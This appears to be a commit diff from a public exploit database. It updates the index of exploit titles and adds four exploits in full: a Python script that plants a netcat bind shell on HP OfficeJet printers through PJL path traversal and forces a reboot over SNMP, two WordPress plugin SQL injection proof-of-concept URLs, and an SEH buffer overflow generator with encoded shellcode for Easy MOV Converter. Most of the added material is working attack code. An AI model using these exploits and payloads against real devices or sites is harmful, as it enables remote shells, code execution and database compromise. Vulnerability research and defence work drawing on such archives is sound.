DB: 2017-06-15

5 new exploits

Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit
Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation

Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)

WarFTP 1.65 - (USER) Remote Buffer Overflow
WarFTP 1.65 - 'USER' Remote Buffer Overflow
Google Chrome - V8 Private Property Arbitrary Code Execution
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution
WordPress Plugin WP Jobs < 1.5 - SQL Injection
WordPress Plugin Event List <= 0.7.8 - SQL Injection

files.csv

@@ -6321,7 +6321,7 @@ id,file,description,date,author,platform,type,port
 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
 9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
-9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,lin_x86-64,local,0
+9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,lin_x86-64,local,0
 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0
 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0
 9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
@@ -9052,6 +9052,7 @@ id,file,description,date,author,platform,type,port
 42160,platforms/windows/local/42160.py,"DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 42161,platforms/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 42163,platforms/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local,0
+42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9687,7 +9688,7 @@ id,file,description,date,author,platform,type,port
 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53
 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage Exploit",2007-03-23,"Jon Hart",multiple,remote,0
 3561,platforms/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143
-3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21
+3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - 'USER' Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21
 3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,windows,remote,0
 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double-Free Memory Exploit (MS07-009)",2007-03-26,anonymous,windows,remote,0
 3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - (PASS) Remote Exploit",2007-03-26,"Winny Thomas",windows,remote,21
@@ -15596,6 +15597,8 @@ id,file,description,date,author,platform,type,port
 42158,platforms/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,linux,remote,0
 42159,platforms/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",windows,remote,0
 42165,platforms/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow",2017-06-12,"Touhid M.Shaikh",windows,remote,0
+42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0
+42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37998,3 +38001,5 @@ id,file,description,date,author,platform,type,port
 42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0
 42166,platforms/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",php,webapps,0
 42167,platforms/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps,0
+42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0
+42173,platforms/php/webapps/42173.txt,"WordPress Plugin Event List <= 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",php,webapps,0

platforms/hardware/remote/42176.py

@@ -0,0 +1,49 @@
+##
+# Create a bind shell on an unpatched OfficeJet 8210
+# Write a script to profile.d and reboot the device. When it comes
+# back online then nc to port 1270.
+#
+# easysnmp instructions:
+# sudo apt-get install libsnmp-dev
+# pip install easysnmp
+##
+
+import socket
+import sys
+from easysnmp import snmp_set
+
+profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
+                    '\tmkfifo /tmp/pwned\n'
+                    '\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n
+                    'fi\n')
+
+if len(sys.argv) != 3:
+    print '\nUsage:upload.py [ip] [port]\n'
+    sys.exit()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(2)
+server_address = (sys.argv[1], int(sys.argv[2]))
+print 'connecting to %s port %s' % server_address
+sock.connect(server_address)
+
+dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
+dir_query += profile_d_script
+dir_query += '\x1b%-12345X'
+sock.sendall(dir_query)
+sock.close()
+
+sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock1.connect(server_address)
+dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
+sock1.sendall(dir_query)
+
+response = ''
+while True:
+    data = sock1.recv(1)
+    if '\n' == data: break
+    response += data
+
+print response
+snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1)
+print 'Done! Try port 1270 in ~30 seconds'

platforms/php/webapps/42172.txt

@@ -0,0 +1,50 @@
+# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
+# Date: 11-06-2017
+# Exploit Author: Dimitrios Tsagkarakis
+# Website: dtsa.eu 
+# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
+# Vendor Homepage: http://www.intensewp.com/
+# Version: 1.4
+# CVE : CVE-2017-9603
+# Category: webapps
+
+ 
+
+1. Description:
+
+   
+
+SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
+allows authenticated users to execute arbitrary SQL commands via the jobid
+parameter to wp-admin/edit.php. 
+
+ 
+
+2. Proof of Concept:
+
+ 
+
+http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
+obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
+
+ 
+
+3. Solution:
+
+   
+
+A new version of WP Jobs is available. Update the WordPress WP Jobs to the
+latest version.
+
+ 
+
+4. Reference:
+
+ 
+
+http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/
+
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603
+
+ 
+

platforms/php/webapps/42173.txt

@@ -0,0 +1,52 @@
+# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
+# Date: 04-06-2017
+# Exploit Author: Dimitrios Tsagkarakis
+# Website: dtsa.eu 
+# Software Link: https://wordpress.org/plugins/event-list/
+# Version: 0.7.8
+# CVE : CVE-2017-9429
+# Category: webapps
+
+ 
+
+1. Description:
+
+   
+
+SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
+allows an authenticated user to execute arbitrary SQL commands via the id
+parameter to wp-admin/admin.php. 
+
+ 
+
+2. Proof of Concept:
+
+ 
+
+http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
+=1 AND SLEEP(10)
+
+ 
+
+3. Solution:
+
+   
+
+The plugin has been removed from WordPress. Deactivate the plug-in and wait
+for a hotfix.
+
+ 
+
+4. Reference:
+
+ 
+
+http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
+ction-sqli/
+
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
+
+ 
+
+ 
+

platforms/windows/local/42174.py

@@ -0,0 +1,59 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title:        Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
+# Date:                 13-06-2017
+# Exploit Author:       @abatchy17 -- www.abatchy.com
+# Vulnerable Software:  Easy MOV Converter 
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              1.4.24
+# Software Link:        http://www.divxtodvd.net/easy_mov_converter.exe
+# Tested On:            Windows 7 SP1 32bit
+#
+# Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911).
+#
+# To reproduce the exploit:
+#	1. Click Register
+#	2. In the "Enter User Name" field, paste the content of exploit.txt
+#
+##############################################################################
+
+# If you're using WinXP SP3, change this to 996
+buffer = "\x41" * 1008
+
+nSEH = "\xeb\x10\x90\x90"
+
+# 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\Easy MOV Converter\SkinMagic.dll)
+SEH = "\x5c\x14\x01\x10"
+
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+
+junk = "\x90" * 16
+
+badchars = "\x0a\x0d"
+
+data = buffer + nSEH + SEH + junk + buf
+
+f = open ("exploit.txt", "w")
+f.write(data)
+f.close()